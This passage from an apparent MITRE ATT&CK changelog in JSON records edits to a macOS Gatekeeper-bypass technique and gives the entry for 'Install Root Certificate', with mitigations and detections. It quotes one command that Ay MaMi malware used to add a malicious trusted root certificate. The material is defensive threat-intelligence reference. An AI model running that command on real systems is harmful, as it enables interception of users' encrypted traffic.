Stealth](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)\\n \\n Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to28__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to28__0\"><a href=\"#difflib_chg_to28__top\">t</a></td><td class=\"diff_header\" id=\"from28_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;modify&nbsp;file&nbsp;attributes&nbsp;and&nbsp;subvert&nbsp;Gatekeepe</td><td class=\"diff_next\"><a href=\"#difflib_chg_to28__top\">t</a></td><td class=\"diff_header\" id=\"to28_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;modify&nbsp;file&nbsp;attributes&nbsp;and&nbsp;subvert&nbsp;Gatekeepe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;functionality&nbsp;to&nbsp;evade&nbsp;user&nbsp;prompts&nbsp;and&nbsp;execute&nbsp;untrusted&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;functionality&nbsp;to&nbsp;evade&nbsp;user&nbsp;prompts&nbsp;and&nbsp;execute&nbsp;untrusted&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">programs.&nbsp;Gatekeeper&nbsp;is&nbsp;a&nbsp;set&nbsp;of&nbsp;technologies&nbsp;that&nbsp;act&nbsp;as&nbsp;la</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">programs.&nbsp;Gatekeeper&nbsp;is&nbsp;a&nbsp;set&nbsp;of&nbsp;technologies&nbsp;that&nbsp;act&nbsp;as&nbsp;la</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">yer&nbsp;of&nbsp;Apple\u2019s&nbsp;security&nbsp;model&nbsp;to&nbsp;ensure&nbsp;only&nbsp;trusted&nbsp;applica</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">yer&nbsp;of&nbsp;Apple\u2019s&nbsp;security&nbsp;model&nbsp;to&nbsp;ensure&nbsp;only&nbsp;trusted&nbsp;applica</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tions&nbsp;are&nbsp;executed&nbsp;on&nbsp;a&nbsp;host.&nbsp;Gatekeeper&nbsp;was&nbsp;built&nbsp;on&nbsp;top&nbsp;of</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tions&nbsp;are&nbsp;executed&nbsp;on&nbsp;a&nbsp;host.&nbsp;Gatekeeper&nbsp;was&nbsp;built&nbsp;on&nbsp;top&nbsp;of</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;File&nbsp;Quarantine&nbsp;in&nbsp;Snow&nbsp;Leopard&nbsp;(10.6,&nbsp;2009)&nbsp;and&nbsp;has&nbsp;grown&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;File&nbsp;Quarantine&nbsp;in&nbsp;Snow&nbsp;Leopard&nbsp;(10.6,&nbsp;2009)&nbsp;and&nbsp;has&nbsp;grown&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;include&nbsp;Code&nbsp;Signing,&nbsp;security&nbsp;policy&nbsp;compliance,&nbsp;Notariz</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;include&nbsp;Code&nbsp;Signing,&nbsp;security&nbsp;policy&nbsp;compliance,&nbsp;Notariz</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation,&nbsp;and&nbsp;more.&nbsp;Gatekeeper&nbsp;also&nbsp;treats&nbsp;applications&nbsp;running</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation,&nbsp;and&nbsp;more.&nbsp;Gatekeeper&nbsp;also&nbsp;treats&nbsp;applications&nbsp;running</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;for&nbsp;the&nbsp;first&nbsp;time&nbsp;differently&nbsp;than&nbsp;reopened&nbsp;applications.(</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;for&nbsp;the&nbsp;first&nbsp;time&nbsp;differently&nbsp;than&nbsp;reopened&nbsp;applications.(</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Citation:&nbsp;TheEclecticLightCompany&nbsp;Quarantine&nbsp;and&nbsp;the&nbsp;flag)(C</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Citation:&nbsp;TheEclecticLightCompany&nbsp;Quarantine&nbsp;and&nbsp;the&nbsp;flag)(C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;TheEclecticLightCompany&nbsp;apple&nbsp;notarization&nbsp;)&nbsp;&nbsp;Based</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;TheEclecticLightCompany&nbsp;apple&nbsp;notarization&nbsp;)&nbsp;&nbsp;Based</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;on&nbsp;an&nbsp;opt-in&nbsp;system,&nbsp;when&nbsp;files&nbsp;are&nbsp;downloaded&nbsp;an&nbsp;extended&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;on&nbsp;an&nbsp;opt-in&nbsp;system,&nbsp;when&nbsp;files&nbsp;are&nbsp;downloaded&nbsp;an&nbsp;extended&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attribute&nbsp;(xattr)&nbsp;called&nbsp;`com.apple.quarantine`&nbsp;(also&nbsp;known&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attribute&nbsp;(xattr)&nbsp;called&nbsp;`com.apple.quarantine`&nbsp;(also&nbsp;known&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;a&nbsp;quarantine&nbsp;flag)&nbsp;can&nbsp;be&nbsp;set&nbsp;on&nbsp;the&nbsp;file&nbsp;by&nbsp;the&nbsp;applicat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;a&nbsp;quarantine&nbsp;flag)&nbsp;can&nbsp;be&nbsp;set&nbsp;on&nbsp;the&nbsp;file&nbsp;by&nbsp;the&nbsp;applicat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion&nbsp;performing&nbsp;the&nbsp;download.&nbsp;Launch&nbsp;Services&nbsp;opens&nbsp;the&nbsp;appli</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion&nbsp;performing&nbsp;the&nbsp;download.&nbsp;Launch&nbsp;Services&nbsp;opens&nbsp;the&nbsp;appli</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cation&nbsp;in&nbsp;a&nbsp;suspended&nbsp;state.&nbsp;For&nbsp;first&nbsp;run&nbsp;applications&nbsp;with</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cation&nbsp;in&nbsp;a&nbsp;suspended&nbsp;state.&nbsp;For&nbsp;first&nbsp;run&nbsp;applications&nbsp;with</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;quarantine&nbsp;flag&nbsp;set,&nbsp;Gatekeeper&nbsp;executes&nbsp;the&nbsp;following&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;quarantine&nbsp;flag&nbsp;set,&nbsp;Gatekeeper&nbsp;executes&nbsp;the&nbsp;following&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">functions:&nbsp;&nbsp;1.&nbsp;Checks&nbsp;extended&nbsp;attribute&nbsp;\u2013&nbsp;Gatekeeper&nbsp;checks</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">functions:&nbsp;&nbsp;1.&nbsp;Checks&nbsp;extended&nbsp;attribute&nbsp;\u2013&nbsp;Gatekeeper&nbsp;checks</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;for&nbsp;the&nbsp;quarantine&nbsp;flag,&nbsp;then&nbsp;provides&nbsp;an&nbsp;alert&nbsp;prompt&nbsp;to&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;for&nbsp;the&nbsp;quarantine&nbsp;flag,&nbsp;then&nbsp;provides&nbsp;an&nbsp;alert&nbsp;prompt&nbsp;to&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;user&nbsp;to&nbsp;allow&nbsp;or&nbsp;deny&nbsp;execution.(Citation:&nbsp;OceanLotus&nbsp;for</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;user&nbsp;to&nbsp;allow&nbsp;or&nbsp;deny&nbsp;execution.(Citation:&nbsp;OceanLotus&nbsp;for</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;OS&nbsp;X)(Citation:&nbsp;20&nbsp;macOS&nbsp;Common&nbsp;Tools&nbsp;and&nbsp;Techniques)&nbsp;&nbsp;2.&nbsp;C</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;OS&nbsp;X)(Citation:&nbsp;20&nbsp;macOS&nbsp;Common&nbsp;Tools&nbsp;and&nbsp;Techniques)&nbsp;&nbsp;2.&nbsp;C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hecks&nbsp;System&nbsp;Policies&nbsp;-&nbsp;Gatekeeper&nbsp;checks&nbsp;the&nbsp;system&nbsp;securit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hecks&nbsp;System&nbsp;Policies&nbsp;-&nbsp;Gatekeeper&nbsp;checks&nbsp;the&nbsp;system&nbsp;securit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;policy,&nbsp;allowing&nbsp;execution&nbsp;of&nbsp;apps&nbsp;downloaded&nbsp;from&nbsp;either&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;policy,&nbsp;allowing&nbsp;execution&nbsp;of&nbsp;apps&nbsp;downloaded&nbsp;from&nbsp;either&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">just&nbsp;the&nbsp;App&nbsp;Store&nbsp;or&nbsp;the&nbsp;App&nbsp;Store&nbsp;and&nbsp;identified&nbsp;developer</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">just&nbsp;the&nbsp;App&nbsp;Store&nbsp;or&nbsp;the&nbsp;App&nbsp;Store&nbsp;and&nbsp;identified&nbsp;developer</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.&nbsp;&nbsp;3.&nbsp;Code&nbsp;Signing&nbsp;\u2013&nbsp;Gatekeeper&nbsp;checks&nbsp;for&nbsp;a&nbsp;valid&nbsp;code&nbsp;sig</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.&nbsp;&nbsp;3.&nbsp;Code&nbsp;Signing&nbsp;\u2013&nbsp;Gatekeeper&nbsp;checks&nbsp;for&nbsp;a&nbsp;valid&nbsp;code&nbsp;sig</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nature&nbsp;from&nbsp;an&nbsp;Apple&nbsp;Developer&nbsp;ID.&nbsp;&nbsp;4.&nbsp;Notarization&nbsp;-&nbsp;Using&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nature&nbsp;from&nbsp;an&nbsp;Apple&nbsp;Developer&nbsp;ID.&nbsp;&nbsp;4.&nbsp;Notarization&nbsp;-&nbsp;Using&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">the&nbsp;`api.apple-cloudkit.com`&nbsp;API,&nbsp;Gatekeeper&nbsp;reaches&nbsp;out&nbsp;to&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">the&nbsp;`api.apple-cloudkit.com`&nbsp;API,&nbsp;Gatekeeper&nbsp;reaches&nbsp;out&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Apple&nbsp;servers&nbsp;to&nbsp;verify&nbsp;or&nbsp;pull&nbsp;down&nbsp;the&nbsp;notarization&nbsp;ticket</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Apple&nbsp;servers&nbsp;to&nbsp;verify&nbsp;or&nbsp;pull&nbsp;down&nbsp;the&nbsp;notarization&nbsp;ticket</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;and&nbsp;ensure&nbsp;the&nbsp;ticket&nbsp;is&nbsp;not&nbsp;revoked.&nbsp;Users&nbsp;can&nbsp;override&nbsp;no</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;and&nbsp;ensure&nbsp;the&nbsp;ticket&nbsp;is&nbsp;not&nbsp;revoked.&nbsp;Users&nbsp;can&nbsp;override&nbsp;no</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tarization,&nbsp;which&nbsp;will&nbsp;result&nbsp;in&nbsp;a&nbsp;prompt&nbsp;of&nbsp;executing&nbsp;an&nbsp;\u201cu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tarization,&nbsp;which&nbsp;will&nbsp;result&nbsp;in&nbsp;a&nbsp;prompt&nbsp;of&nbsp;executing&nbsp;an&nbsp;\u201cu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nauthorized&nbsp;app\u201d&nbsp;and&nbsp;the&nbsp;security&nbsp;policy&nbsp;will&nbsp;be&nbsp;modified.&nbsp;&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nauthorized&nbsp;app\u201d&nbsp;and&nbsp;the&nbsp;security&nbsp;policy&nbsp;will&nbsp;be&nbsp;modified.&nbsp;&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Adversaries&nbsp;can&nbsp;subvert&nbsp;one&nbsp;or&nbsp;multiple&nbsp;security&nbsp;controls&nbsp;wi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Adversaries&nbsp;can&nbsp;subvert&nbsp;one&nbsp;or&nbsp;multiple&nbsp;security&nbsp;controls&nbsp;wi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">thin&nbsp;Gatekeeper&nbsp;checks&nbsp;through&nbsp;logic&nbsp;errors&nbsp;(e.g.&nbsp;[Exploitat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">thin&nbsp;Gatekeeper&nbsp;checks&nbsp;through&nbsp;logic&nbsp;errors&nbsp;(e.g.&nbsp;[Exploitat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion&nbsp;for&nbsp;<span class=\"diff_chg\">Defense&nbsp;Evasion</span>](https://attack.mitre.org/techniques</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion&nbsp;for&nbsp;<span class=\"diff_chg\">Stealth</span>](https://attack.mitre.org/techniques/T1211))</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/T1211)),&nbsp;unchecked&nbsp;file&nbsp;types,&nbsp;and&nbsp;external&nbsp;libraries.&nbsp;For&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;unchecked&nbsp;file&nbsp;types,&nbsp;and&nbsp;external&nbsp;libraries.&nbsp;For&nbsp;example,</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">example,&nbsp;prior&nbsp;to&nbsp;macOS&nbsp;13&nbsp;Ventura,&nbsp;code&nbsp;signing&nbsp;and&nbsp;notariz</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;prior&nbsp;to&nbsp;macOS&nbsp;13&nbsp;Ventura,&nbsp;code&nbsp;signing&nbsp;and&nbsp;notarization&nbsp;ch</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;checks&nbsp;were&nbsp;only&nbsp;conducted&nbsp;on&nbsp;first&nbsp;launch,&nbsp;allowing&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecks&nbsp;were&nbsp;only&nbsp;conducted&nbsp;on&nbsp;first&nbsp;launch,&nbsp;allowing&nbsp;adversari</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dversaries&nbsp;to&nbsp;write&nbsp;malicious&nbsp;executables&nbsp;to&nbsp;previously&nbsp;open</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;to&nbsp;write&nbsp;malicious&nbsp;executables&nbsp;to&nbsp;previously&nbsp;opened&nbsp;appli</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;applications&nbsp;in&nbsp;order&nbsp;to&nbsp;bypass&nbsp;Gatekeeper&nbsp;security&nbsp;check</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cations&nbsp;in&nbsp;order&nbsp;to&nbsp;bypass&nbsp;Gatekeeper&nbsp;security&nbsp;checks.(Citat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.(Citation:&nbsp;theevilbit&nbsp;gatekeeper&nbsp;bypass&nbsp;2021)(Citation:&nbsp;Ap</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion:&nbsp;theevilbit&nbsp;gatekeeper&nbsp;bypass&nbsp;2021)(Citation:&nbsp;Applicatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">plication&nbsp;Bundle&nbsp;Manipulation&nbsp;Brandon&nbsp;Dalton)&nbsp;&nbsp;Applications&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;Bundle&nbsp;Manipulation&nbsp;Brandon&nbsp;Dalton)&nbsp;&nbsp;Applications&nbsp;and&nbsp;file</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;files&nbsp;loaded&nbsp;onto&nbsp;the&nbsp;system&nbsp;from&nbsp;a&nbsp;USB&nbsp;flash&nbsp;drive,&nbsp;opt</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;loaded&nbsp;onto&nbsp;the&nbsp;system&nbsp;from&nbsp;a&nbsp;USB&nbsp;flash&nbsp;drive,&nbsp;optical&nbsp;dis</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ical&nbsp;disk,&nbsp;external&nbsp;hard&nbsp;drive,&nbsp;from&nbsp;a&nbsp;drive&nbsp;shared&nbsp;over&nbsp;the</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k,&nbsp;external&nbsp;hard&nbsp;drive,&nbsp;from&nbsp;a&nbsp;drive&nbsp;shared&nbsp;over&nbsp;the&nbsp;local&nbsp;n</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;local&nbsp;network,&nbsp;or&nbsp;using&nbsp;the&nbsp;curl&nbsp;command&nbsp;may&nbsp;not&nbsp;set&nbsp;the&nbsp;qu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">etwork,&nbsp;or&nbsp;using&nbsp;the&nbsp;curl&nbsp;command&nbsp;may&nbsp;not&nbsp;set&nbsp;the&nbsp;quarantine</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">arantine&nbsp;flag.&nbsp;Additionally,&nbsp;it&nbsp;is&nbsp;possible&nbsp;to&nbsp;avoid&nbsp;setting</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;flag.&nbsp;Additionally,&nbsp;it&nbsp;is&nbsp;possible&nbsp;to&nbsp;avoid&nbsp;setting&nbsp;the&nbsp;qua</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;quarantine&nbsp;flag&nbsp;using&nbsp;[Drive-by&nbsp;Compromise](https://att</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rantine&nbsp;flag&nbsp;using&nbsp;[Drive-by&nbsp;Compromise](https://attack.mitr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ack.mitre.org/techniques/T1189).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.org/techniques/T1189).</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0288: Detect Gatekeeper Bypass via Quarantine Flag and Trust Control Manipulation"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-21 21:05:32.844000+00:00",
                    "modified": "2026-04-16 20:07:52.931000+00:00",
                    "name": "Install Root Certificate",
                    "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1553/004",
                            "external_id": "T1553.004"
                        },
                        {
                            "source_name": "Operation Emmental",
                            "description": "botconf eu. (2014, December 31). David Sancho - Finding Holes in Banking 2FA: Operation Emmental. Retrieved January 4, 2024.",
                            "url": "https://www.youtube.com/watch?v=gchKFumYHWc"
                        },
                        {
                            "source_name": "SpectorOps Code Signing Dec 2017",
                            "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.",
                            "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"
                        },
                        {
                            "source_name": "Kaspersky Superfish",
                            "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.",
                            "url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/"
                        },
                        {
                            "source_name": "objective-see ay mami 2018",
                            "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.",
                            "url": "https://objective-see.com/blog/blog_0x26.html"
                        },
                        {
                            "source_name": "Wikipedia Root Certificate",
                            "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.",
                            "url": "https://en.wikipedia.org/wiki/Root_certificate"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Itzik Kotler, SafeBreach",
                        "Matt Graeber, @mattifestation, SpecterOps",
                        "Red Canary",
                        "Travis Smith, Tripwire"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
